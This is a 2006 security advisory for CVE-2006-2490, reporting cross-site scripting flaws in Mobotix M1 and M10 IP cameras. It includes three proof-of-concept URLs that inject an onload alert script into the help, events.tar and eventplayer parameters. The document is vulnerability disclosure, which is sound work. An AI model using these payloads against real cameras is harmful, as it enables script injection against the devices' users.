Mobotix IP Network Cameras Multiple XSS

2006.05.23

Credit: jaime blasco

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-2490

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Mobotix IP Network Cameras Multiple XSS
Version: Tested on M1 and M10
- M10-V2.0.5.2
- M1-V1.9.4.7
Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es
Description:
Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws.
Due to improper filtering a remote attacker can cause a cross site scripting in these scripts:
http://camera/help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E
http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.e
azel.es')%3E&download=egal
http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOA
D=alert('www.eazel.es')%3E
The advisorie can be found at : http://www.eazel.es/media/advisory001.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mobotix IP Network Cameras Multiple XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.